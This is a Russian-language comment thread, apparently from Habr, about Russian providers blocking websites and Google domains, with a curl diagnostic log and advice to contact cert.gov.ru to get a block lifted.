            Домен заблокирован с марта 2022 г., вместе с блокировкой news.google.com


            1. vanxant
              05.06.2023 13:22
              #25622502

              хз, у меня работает. Лучше проверять на метатеррористах или там рутре**ре


          1. ImidgX
            05.06.2023 13:22
            #25621526

            На Билайне в браузере показывает таймаут.
            А в консоли зависает на handshake клиента.
            curl -iv -s https://play.google.com/

            Trying 142.250.74.110:443...

            • TCP_NODELAY set

            • Connected to play.google.com (142.250.74.110) port 443 (#0)

            • ALPN, offering h2

            • ALPN, offering http/1.1

            • successfully set certificate verify locations:

            • CAfile: /etc/ssl/certs/ca-certificates.crt CApath: /etc/ssl/certs

            • TLSv1.3 (OUT), TLS handshake, Client hello (1):


            1. Tippy-Tip
              05.06.2023 13:22
              #25622126
              -3

              Англичанка гадит. Даже на хабре писали, что Гугл по собственной инициативе без широкой огласки забанил пользователей из РФ и Белорусии.


              1. Tippy-Tip
                05.06.2023 13:22
                #25624004

                Господа минусеры! Соблаговолите пожалуйста почитать соответствующую ветку на 4pda, начиная хотя бы отсюда


                1. balamutang
                  05.06.2023 13:22
                  #25624836

                  Истина давно уже никому не нужна, минусы тут зачастую ставят на эмоциях и ваша "англичанка" эти эмоции отлично триггерит.

                  Удерживайтесь от политических дискуссий и штампов если вас беспокоят минусы.


              1. Stanislavvv
                05.06.2023 13:22
                #25626894

                То есть, пользователей забанил, а датацентры - нет?
                У меня вдс в Екб, оттуда открывается. И по whois - тоже RU, а не где-то ещё.


    1. ImidgX
      05.06.2023 13:22
      #25621136

      У меня так и случилось. Сайты оперативно откатил, но блокировка всё равно случилась на следующий день. Провайдеры (МТС, Мегафон и Билайн) их блокируют и не сознаются. РКН два раза ответил на запрос, типа мы ничего не блокируем, при этом сайты не грузятся.

      Проще сменить домен. (-_-)


      1. blind_oracle
        05.06.2023 13:22
        #25621414
        +6

        Цифровой концлагерь


    1. ImidgX
      05.06.2023 13:22
      #25621534
      +1

      Подскажите пожалуйста, есть ли хоть какой-то вариант снять эти "внереестровые блокировки сайта"?


      1. ValdikSS
        05.06.2023 13:22
        #25621592
        +1

        Попробуйте в церт написать, как советует статья. Вдруг поможет.

        https://cert.gov.ru/


      1. Darkholme
        05.06.2023 13:22
        #25622156
        +1

        Есть, но он(и) не технические (как и корень проблемы) и к тематике сайта не относится


      1. idmrty
        05.06.2023 13:22
        #25624226
        +1

        После лечения напишите на incident@cert.gov.ru — разблокируют за пару часов.


      1. Stanislavvv
        05.06.2023 13:22
        #25626908

        1) нужно таки написать как сказано, если всё ок - таки разбанивают, проверено.
        2) блокировка снимается перевыпуском сертификата (вот хз, насовсем или временно).


  1. zzzzzzzzzzzz
    05.06.2023 13:22
    #25626268

    в дальнейшем злоумышленник использовал эти файлы для заражения клиентских браузеров, то есть посетителей сайта

    чего_бля.jpg